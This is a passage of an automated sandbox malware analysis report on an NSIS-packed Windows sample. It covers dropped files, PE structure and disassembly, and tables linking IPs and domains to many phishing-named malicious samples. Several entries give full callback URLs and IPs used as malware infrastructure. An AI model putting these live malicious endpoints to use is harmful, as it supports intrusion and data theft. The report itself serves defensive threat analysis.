                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .exe
                                                                      Warnings:
                                                                      Show All
                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                      • TCP Packets have been reduced to 100
                                                                      • Excluded IPs from analysis (whitelisted): 104.43.139.144, 23.54.113.53, 13.88.21.125, 104.43.193.48, 52.147.198.201, 95.100.54.203, 20.50.102.62, 23.10.249.26, 23.10.249.43, 20.54.26.129
                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus15.cloudapp.net

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      No simulations

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      52.58.78.16hvEop8Y70Y.exeGet hashmaliciousBrowse
                                                                      • www.ux300e.com/iu4d/?AR6=JvjSk9WUlBdgONG69H9sib5J4SPt/vPlwOmf1A06UqzVvRJVghpTE97et7kDme6aF6nY&nflLiT=xPJxAxbPf
                                                                      payment.exeGet hashmaliciousBrowse
                                                                      • www.zhongziciliso.com/bei3/?Rl=M48tiJch&M4YDYvh=k7z9a6KJXiC72cK7/jyRasNe+Sy9PqpwlSKQgjyd8bQZ1xLLuKiQUgQj6rSCbw2ZrbBi
                                                                      Order.exeGet hashmaliciousBrowse
                                                                      • www.knfsupplies.com/cugi/?BlL=qOwU1OTG7mkRPnuzfMsyuhPzA0VHPvUCBiAoo9Zce23EVhCwG2VyIrVTMhZllQbTDf+j&EZXpx6=tXExBh8PdJwpH
                                                                      BL84995005038483.exeGet hashmaliciousBrowse
                                                                      • www.bestsocialprograms.com/mb7q/?Kzr4=aRV3v7STN1gbvnN6un228S10svC1Sutq8rbGJILV4mttNz8FuFvB2m5MPz63ES8dTJFmRm2LIQ==&OtZlC2=JPhH0LRX981dlx
                                                                      PO91361.exeGet hashmaliciousBrowse
                                                                      • www.yuemion.com/sb9r/?j2JhErl=rJxolaRUr1mWG0o1dUZb+NmVdUrYk2L88LMId3La8wrAf3SFZTorjLllmLv1JSZYoSAD&NXf8l=AvBHWhTxsnkxJjj0
                                                                      RFQ-V-SAM-0321D056-DOC.exeGet hashmaliciousBrowse
                                                                      • www.suosht.com/uwec/?v2=tsMTrLYcrap2GukmDd5H+gA9PR5vxlRtmXcAAVzRggD35KIYdxkEWToTwr5T4ko2rax0&CZ6=7nExZbW
                                                                      Shinshin Machinery.exe.exeGet hashmaliciousBrowse
                                                                      • www.annabelsasia.com/g7b/?Bzu=IjtUh+ajvqDBCqeZNN5uvvLYJJH0gAt6k2v6kHQzMhdo+O3jDfMFt+ZnLjs+WScGQBhC&Rxo=M6hD4jnx_05t
                                                                      yQh96Jd6TZ.exeGet hashmaliciousBrowse
                                                                      • www.nicemoneymaker.com/vu9b/?OV0xlV=b7gOWZrG8twfyhpAFuxkPT+vPN2LggkC47Unn4g6AMPZt2SHOO4aYUooq1pwGFLGZrTg&wh=jL0xYFb0mbwHi
                                                                      Invoice No. 21SWZ020.exeGet hashmaliciousBrowse
                                                                      • www.physicalrobot.com/evpn/?Y2MtLLPX=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB+xjvwGDX3fv&Ezu=UVFpYz0hIPjtGvD
                                                                      P.O_RFQ0098765434.xlsxGet hashmaliciousBrowse
                                                                      • www.nicemoneymaker.com/vu9b/?sHt=b7gOWZrD8qwbyxlMHuxkPT+vPN2LggkC47M37787EsPYtH+BJepWOQQqpQFMdl/1WqGQQA==&Ab=gXuD_lh8bBV4p0A
                                                                      MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                                      • www.vehcimbev.com/rrrq/?uDKlwt=XPiPwvlxrzD&0R-LTpD=ZoyK93BFZg5bhToKNkvS+4H3u7vdriErK6KdZz21IbWYfqVPSHFlcVcSgcySxB5KZp6z
                                                                      SOA.scr.exeGet hashmaliciousBrowse
                                                                      • www.quickshop.xyz/edbs/?1bJ=Fxo0jXLhpT&jpTd3Lg=Xf0AsKcEcxS6VBzv6eMId9BOKf3y7pEXXtGVhjSx+HGa1oGNkidRGQ2YsckjNlg0L7MJ
                                                                      Item pending delivery - Final attempt to reach you.exeGet hashmaliciousBrowse
                                                                      • www.justcleanandgo.com/jpx/?iDHhJJrP=mcSXJ9rzsahvcQNLt2XcaIdq2nh7WmHXrWVcKt4m89SwRwN6h9IEoO42kLqyr3q6izAk&SZ=NZKxbfDht0
                                                                      New Order.xlsxGet hashmaliciousBrowse
                                                                      • www.physicalrobot.com/evpn/?RB=mJ1WicGlY2GmPPBqg48PwwH9NxkuMiIXMjd/3ZNeMhMeYAPtqYgseV4kCY9lkBSICRrYBg==&qDH4D=f8c0xBrPYP1xE
                                                                      TT Remittance Copy.PDF.exeGet hashmaliciousBrowse
                                                                      • www.nastablecoin.com/ihmh/?wP9=9xrH76mdfDx9iKgvbvU3vEebTN88KEv9G+0YP+1kUawk0yQyRcbX9OOF804+QBd5YfcY&lZQ=7nbLunBhP
                                                                      DK Purchase Order 2021 - 00041.exeGet hashmaliciousBrowse
                                                                      • www.cheaperwhere.com/vsk9/?llsp=gTULpTwpERQd0J&GFQH8=K4sIljGD/ZBOPUB8FLFNbj9uZxc3ZJvuM8iCQMLCZdHLzRlSgIHR4yh57xtFQTRa05hO
                                                                      mar2403.xlsxGet hashmaliciousBrowse
                                                                      • www.aideliveryrobot.com/p2io/?sFQ=jva0mvb0GZ&2dz=xikLqsOKlSWJt+SrZg8c4HdBraEMa/77ZWZXTseglAkSxnPi++5EYIqDKkXYJ2G/5JhnXw==
                                                                      Shipping Documents.exeGet hashmaliciousBrowse
                                                                      • www.lestraiteurs.com/6axz/?xpU8Zp=7MONd/FiZVU6hLmzueAQShD5Kj7vy2wgxhD7jfE2wAKraLqkxH1+E5WK2IUxaYLA58eG&et-=XPJpA2ZHxx5p-46P
                                                                      NEW ORDER_PDF.exeGet hashmaliciousBrowse
                                                                      • www.women-un-wine.com/s8ri/?bl=UTChTb0hUjYl5Vd&Y2JpVVJ=ik96MuvU6sYHkk2HN3ePINIdN/MNv9yO6baBAgtLmrjKnPOCk7v5WH2NHL0PYI9oO8wm
                                                                      PO TM-3851 ,BT-4792 RS-70100.xlsxGet hashmaliciousBrowse
                                                                      • www.droneserviceshouston.com/nsag/?NreT=TqyY/GEOSDxjH7dQORdFyQRMdddqkM/uWsPloTk7EWU4HGwS0QcF8O2ZiGzuNHKZm7WqDA==&qH40b=D2MxU0_h3nMhNt

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      www.jcernadas.comShipping Documents.xlsxGet hashmaliciousBrowse
                                                                      • 52.217.8.51
                                                                      Invoice No. 21SWZ020.exeGet hashmaliciousBrowse
                                                                      • 52.217.37.211
                                                                      igPVY6UByI.exeGet hashmaliciousBrowse
                                                                      • 52.217.65.131
                                                                      shops.myshopify.comAQJEKNHnWK.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      New Order.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      payment.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      BL836477488575.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      Order.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      PO.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      PO91361.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      RFQ11_ZIM2021pdf.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      1517679127365.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      W88AZXFGH.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      PaymentInvoice.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      PI 04-02-21.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      OC CVE9362 _TVOP-MIO 2(C) 2021,pdf.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      P1 032021.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      bank details.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      PURCHASE ORDER _675765000.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      YMvYmQQyCz4gkqA.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      yQh96Jd6TZ.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      Swift.exeGet hashmaliciousBrowse
                                                                      • 23.227.38.74

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      AMAZON-02US1wOdXavtlE.exeGet hashmaliciousBrowse
                                                                      • 52.216.179.59
                                                                      hvEop8Y70Y.exeGet hashmaliciousBrowse
                                                                      • 15.165.26.252
                                                                      8sxgohtHjM.exeGet hashmaliciousBrowse
                                                                      • 3.13.255.157
                                                                      eQLPRPErea.exeGet hashmaliciousBrowse
                                                                      • 13.248.216.40
                                                                      vbc.exeGet hashmaliciousBrowse
                                                                      • 3.13.255.157
                                                                      o2KKHvtb3c.exeGet hashmaliciousBrowse
                                                                      • 18.218.104.192
                                                                      Order Inquiry.exeGet hashmaliciousBrowse
                                                                      • 3.14.206.30
                                                                      6IGbftBsBg.exeGet hashmaliciousBrowse
                                                                      • 104.192.141.1
                                                                      nicoleta.fagaras-DHL_TRACKING_1394942.htmlGet hashmaliciousBrowse
                                                                      • 52.218.213.96
                                                                      PaymentAdvice.exeGet hashmaliciousBrowse
                                                                      • 3.14.206.30
                                                                      ikoAImKWvI.exeGet hashmaliciousBrowse
                                                                      • 104.192.141.1
                                                                      BL01345678053567.exeGet hashmaliciousBrowse
                                                                      • 3.14.206.30
                                                                      AL JUNEIDI LIST.xlsxGet hashmaliciousBrowse
                                                                      • 65.0.168.152
                                                                      DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                                                      • 65.0.168.152
                                                                      Statement of Account.xlsxGet hashmaliciousBrowse
                                                                      • 15.165.26.252
                                                                      Shipping Documents.xlsxGet hashmaliciousBrowse
                                                                      • 52.217.8.51
                                                                      bmws51TeIm.exeGet hashmaliciousBrowse
                                                                      • 3.141.177.1
                                                                      Receipt779G0D675432.htmlGet hashmaliciousBrowse
                                                                      • 52.219.97.138
                                                                      PaymentAdvice-copy.htmGet hashmaliciousBrowse
                                                                      • 52.51.245.167
                                                                      Documents_460000622_1464906353.xlsGet hashmaliciousBrowse
                                                                      • 52.12.4.186
                                                                      GD-EMEA-DC-CGN1DEAVRJERqIh4.exeGet hashmaliciousBrowse
                                                                      • 80.67.16.8
                                                                      igPVY6UByI.exeGet hashmaliciousBrowse
                                                                      • 80.67.16.8
                                                                      TaTYytHaBk.exeGet hashmaliciousBrowse
                                                                      • 134.119.32.208
                                                                      530000.exeGet hashmaliciousBrowse
                                                                      • 141.0.20.5
                                                                      RFQ 117839 ASIA TRADING LLC.xlsxGet hashmaliciousBrowse
                                                                      • 80.67.16.8
                                                                      M0uy4pgQzd.exeGet hashmaliciousBrowse
                                                                      • 80.67.16.8
                                                                      inn.exeGet hashmaliciousBrowse
                                                                      • 80.67.16.8
                                                                      h3dFAROdF3.exeGet hashmaliciousBrowse
                                                                      • 92.204.33.8
                                                                      P0_4859930058_NEW_0RDER.xlsxGet hashmaliciousBrowse
                                                                      • 92.204.33.8
                                                                      #Uc708#Ub3c4#Uc6b0_7_#Uacc4#Uc0b0#Uae30 (41 zc9iTHdhxUjXnIh3Y gstE6IT6r9qBBG).jsGet hashmaliciousBrowse
                                                                      • 134.119.244.148
                                                                      #Uc708#Ub3c4#Uc6b0_7_#Uacc4#Uc0b0#Uae30 (41 zc9iTHdhxUjXnIh3Y gstE6IT6r9qBBG).jsGet hashmaliciousBrowse
                                                                      • 134.119.244.148
                                                                      script.exe.7582a080.0x0000000002360000-0x0000000002401fff.exeGet hashmaliciousBrowse
                                                                      • 134.119.246.152
                                                                      app.exe.exeGet hashmaliciousBrowse
                                                                      • 80.67.16.8
                                                                      ANONYMIZEEpikNetworkCHShipping Documents.xlsxGet hashmaliciousBrowse
                                                                      • 45.88.202.115
                                                                      W88AZXFGH.exeGet hashmaliciousBrowse
                                                                      • 45.88.202.115
                                                                      Invoice No. 21SWZ020.exeGet hashmaliciousBrowse
                                                                      • 45.88.202.115
                                                                      igPVY6UByI.exeGet hashmaliciousBrowse
                                                                      • 45.88.202.115
                                                                      New Order.xlsxGet hashmaliciousBrowse
                                                                      • 45.88.202.115
                                                                      MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                                      • 45.88.202.115
                                                                      PO_210316.exe.exeGet hashmaliciousBrowse
                                                                      • 45.88.202.115
                                                                      purchase order PO#00011.exeGet hashmaliciousBrowse
                                                                      • 45.88.202.115
                                                                      PO_210301.exe.exeGet hashmaliciousBrowse
                                                                      • 45.88.202.115
                                                                      PO_210224.exeGet hashmaliciousBrowse
                                                                      • 45.88.202.115
                                                                      8nxKYwJna8.exeGet hashmaliciousBrowse
                                                                      • 45.88.202.115
                                                                      SecuriteInfo.com.generic.ml.exeGet hashmaliciousBrowse
                                                                      • 45.88.202.115
                                                                      EK6BR1KS50.exeGet hashmaliciousBrowse
                                                                      • 45.88.202.115
                                                                      FHT210995.exeGet hashmaliciousBrowse
                                                                      • 45.88.202.115
                                                                      TEC20201601.exeGet hashmaliciousBrowse
                                                                      • 45.88.202.115
                                                                      SUNEJ PAYMENT.exeGet hashmaliciousBrowse
                                                                      • 45.88.202.115
                                                                      JAAkR51fQY.exeGet hashmaliciousBrowse
                                                                      • 45.88.202.115
                                                                      Order_385647584.xlsxGet hashmaliciousBrowse
                                                                      • 45.88.202.115
                                                                      Order (2021.01.06).exeGet hashmaliciousBrowse
                                                                      • 45.88.202.115
                                                                      INVOICE AMAZON.vbsGet hashmaliciousBrowse
                                                                      • 45.88.202.111

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dllShipping Documents.xlsxGet hashmaliciousBrowse

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Temp\8r2vcudkhpr92uroe
                                                                        Process:C:\Users\user\Desktop\TazxfJHRhq.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):164864
                                                                        Entropy (8bit):7.998873219224064
                                                                        Encrypted:true
                                                                        SSDEEP:3072:nn20w7MzJn8Ecdxmy/6K7X/K8XKumqOiP/3DEruScsOAvVm1rwTsRftlP5zVrCyO:n20Tzedxb6K7/6uQ6H6Vm12WJVjgBH5
                                                                        MD5:2DD0138B0F20AE5AC7177A1F06D6B8F0
                                                                        SHA1:C52CDC7ED9BF9F9083647E38A346A904C2EC2E71
                                                                        SHA-256:ABA2394C512FB8E15455DCCA08EFEE65851770AAD3E7BD893722B9D8AFA4FC82
                                                                        SHA-512:5811FF52CC20674803B71283DFBC428CC3879C5D3CEB650783D6F7C3DCD337D06B1B4607219E82B902A542B74ACDADD0D337245B21364A0F43C895140AE20112
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: .VE!1N..s..o.k......p.L.O.7$.R.s.A.v..T8.....4..@........ZC.)..r.S>...S ....q...f.g..\......&.....Y..Mj.3-.... ....tw........Ho.A.\[..@c4.-2..6,T...e.s.P....f*....A.]DHo.L......>P.Y=.....t.K{..!.6.9l...\.....:.".D......X......%.b.{..5)]..`)B=.+........O.^.c,pw.j....c9..+.fjX....43...W..L..?&...^.J.A..=O.#..y....Mv...a.v.....Q.">.0..w.|!.+.vc...{.n....qk..-./....`....+L{......Z...].=..k..:...P.t....`.F~.$.6.:*|.0vw.Mr.._.}..w..w......2.\h0t5...o. ..(.m..V..G..?.HT.........P...6x..K...........:.9......!x.....l...P.g_..C..w...-o.e..Y(.N...g.....D...Y.+..../...KDx..0..Y....._..@.....>.z..o...?z.hy......6..XDO+r...,TG9..G.R...y$.J.wa`u..Oos;x5.=..I..R.5G.n"k..;#7.]....H(.@!m.....#.RU...idd.....H........iD..3..0i9..c~L-Z.Wy..&..yNub.. .Qn........ ...K6O...[..>...SF...o*.. 8.Y...D..{...'..s..W...>..M..}Z4.CUG7..(?y....sj+Z.[(..(..%k.1...^...~..n7.=.V.....@b[..4l@.Zx..4....=.f..=Bi.V...fj....;...p....f.o..x.].7.I...i+h.Q.up..>.}.J..8...KJ7./?.
                                                                        C:\Users\user\AppData\Local\Temp\ael13j4hp6ajgnz
                                                                        Process:C:\Users\user\Desktop\TazxfJHRhq.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):6661
                                                                        Entropy (8bit):7.95921652590791
                                                                        Encrypted:false
                                                                        SSDEEP:192:7gyrXJsdJ0Yu2/s21RhjaSWyBi4tubwh/0fPpiQRFunaVtKib8R:7xbJsdJRu2E2BjaSWutub20PpiQXunaU
                                                                        MD5:68AAAFB180E036036F4AF426F57AD27A
                                                                        SHA1:5175001491EEBB7EA7C719522B8763F35164DC39
                                                                        SHA-256:D7CB9EFD854CF198E0B97202303C5DD24168886C5BEB4979CA99F13CDD43B94C
                                                                        SHA-512:37693CE040DF7C3981A37639D3DC153A8CCC828A8F8DFAB9A34B8357D6B6AC9BDE1355BB7501B662EFF7323BD08D16DE5B7790F6C5C0FBC910ADBDFCBD51E9B6
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: s.}.h....Vl........*........3q.E.X.2..1.j.X.s..W....N.......e......<.{.3..Gl.....aM....o..F......o.~_.....y.nM(..dQ]*.!..~./*...|V0:]...!...w8.MC...<..p..k.VP...5....?..w5.S:4.U....|..!H`.5... H....U. ..O.A..y.:... ..Z7..g.*F...F..hm.5..<.{C....,..AFv.BUz. ...d....eBy._V.M......xa ..7.5=...H.%@._|i...Ih..!.28..........y.Y..Mp..Z.....B1zP]......*..............de.R...g&..Xy.K50....&.e.1..@6.....=..Eh.VP....5Im......V<..j......h..u.1>.a...V.l.....CXdC..y.|..5.mQB.......!4.$.5e_z..(,...#..R.zV.K..<f...Hd.g...[^u.&....6N.A..o.<'....j......]q....}..ND...K....B..n:{..V7.AYG..m.4 Y....u<xN......V.7.a...enM...{[.....M...;..q`...0..'.s..G.MCE............../...G).......q...8A^.E.-....(d....0j...9|.+...G..^.....4..DpAB..j..>....O...O8..slK.a;B.1../..{j..L.b.|.....-..E.a.Lf.1..<u.>.......4z|.. .D).kdV.....{...Y.Y.<. ..N.....+Fg..Y~..6._$..0;...M(..(.\./{a~%<W.u:.tU.z.......D...@6h.[.ZT.B~Y..6.u......e..3C....p...S.........}(i..G..q...*2y|...8....5W..0Z.-m.%
                                                                        C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll
                                                                        Process:C:\Users\user\Desktop\TazxfJHRhq.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):5120
                                                                        Entropy (8bit):4.166853769661324
                                                                        Encrypted:false
                                                                        SSDEEP:48:StR2JALQKHIPA15PXha+HGLFHIPAROGa4zzBvoAXAdUMQ9BgqRuqSrS:EHL1IkYLlIhGXHBgVueKx
                                                                        MD5:41F5D6CADD673464980F0835B0801D4D
                                                                        SHA1:6753C31B14C5CFA9F3BCF8D05DB35554BE80BA68
                                                                        SHA-256:491AB0BE0C90490BDC145350F86ED973C715DC2F9236D0BEB1A7E6EF8D04A4E8
                                                                        SHA-512:D61D598894350C5497DB9419678CA63705E64F3B4368DA1675ACD8E7DDF141B6C6D6CCC0AC821CF07F3464A2285DF95617E4A7BC1A8390CB46567D360B645210
                                                                        Malicious:false
                                                                        Joe Sandbox View:
                                                                        • Filename: Shipping Documents.xlsx, Detection: malicious, Browse
                                                                        Reputation:low
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;T..hT..hT..h@..iG..hT..h{..h...iU..h...iU..h...hU..h...iU..hRichT..h................PE..L...NUn`...........!......................... ...............................`............@.........................0!..T...p".......@.......................P..p....!............................................... ...............................text............................... ..`.rdata..@.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                        Entropy (8bit):7.906066510460472
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                        • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:TazxfJHRhq.exe
                                                                        File size:207024
                                                                        MD5:f818665dd48a93c48255d3ceadf92a6e
                                                                        SHA1:2567c8a3e1a3e3e98782ea8d0d117518ccd4291b
                                                                        SHA256:6bb8fa14bf9c650a67541ffedff2e3f1c055454b90489653c95aa39284d7eb92
                                                                        SHA512:ab05d43f21ca306ce3f0ab580206ef992fa7f004de21a15738448603e96213b16dd76c8e45fd625ed1c9c894ceded6fdfa8eca21874c405e9acc0fe84e961f4c
                                                                        SSDEEP:6144:Hd99R20Tzedxb6K7/6uQ6H6Vm12WJVjgBHd:n9DzyxTSuQGUd
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.....

                                                                        File Icon

                                                                        Icon Hash:b2a88c96b2ca6a72

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x40314a
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                        DLL Characteristics:
                                                                        Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        sub esp, 0000017Ch
                                                                        push ebx
                                                                        push ebp
                                                                        push esi
                                                                        xor esi, esi
                                                                        push edi
                                                                        mov dword ptr [esp+18h], esi
                                                                        mov ebp, 00409240h
                                                                        mov byte ptr [esp+10h], 00000020h
                                                                        call dword ptr [00407030h]
                                                                        push esi
                                                                        call dword ptr [00407270h]
                                                                        mov dword ptr [007A3030h], eax
                                                                        push esi
                                                                        lea eax, dword ptr [esp+30h]
                                                                        push 00000160h
                                                                        push eax
                                                                        push esi
                                                                        push 0079E540h
                                                                        call dword ptr [00407158h]
                                                                        push 00409230h
                                                                        push 007A2780h
                                                                        call 00007F77F8BC53D8h
                                                                        mov ebx, 007AA400h
                                                                        push ebx
                                                                        push 00000400h
                                                                        call dword ptr [004070B4h]
                                                                        call 00007F77F8BC2B19h
                                                                        test eax, eax
                                                                        jne 00007F77F8BC2BD6h
                                                                        push 000003FBh
                                                                        push ebx
                                                                        call dword ptr [004070B0h]
                                                                        push 00409228h
                                                                        push ebx
                                                                        call 00007F77F8BC53C3h
                                                                        call 00007F77F8BC2AF9h
                                                                        test eax, eax
                                                                        je 00007F77F8BC2CF2h
                                                                        mov edi, 007A9000h
                                                                        push edi
                                                                        call dword ptr [00407140h]
                                                                        call dword ptr [004070ACh]
                                                                        push eax
                                                                        push edi
                                                                        call 00007F77F8BC5381h
                                                                        push 00000000h
                                                                        call dword ptr [00407108h]
                                                                        cmp byte ptr [007A9000h], 00000022h
                                                                        mov dword ptr [007A2F80h], eax
                                                                        mov eax, edi
                                                                        jne 00007F77F8BC2BBCh
                                                                        mov byte ptr [esp+10h], 00000022h
                                                                        mov eax, 00000001h

                                                                        Rich Headers

                                                                        Programming Language:
                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x73440xb4.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ac0000x900.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x59de0x5a00False0.681293402778data6.5143386598IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x70000x10f20x1200False0.430338541667data5.0554281206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0x90000x39a0340x400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .ndata0x3a40000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x3ac0000x9000xa00False0.409375data3.94574916515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountry
                                                                        RT_ICON0x3ac1900x2e8dataEnglishUnited States
                                                                        RT_DIALOG0x3ac4780x100dataEnglishUnited States
                                                                        RT_DIALOG0x3ac5780x11cdataEnglishUnited States
                                                                        RT_DIALOG0x3ac6980x60dataEnglishUnited States
                                                                        RT_GROUP_ICON0x3ac6f80x14dataEnglishUnited States
                                                                        RT_MANIFEST0x3ac7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                        Imports

                                                                        DLLImport
                                                                        KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
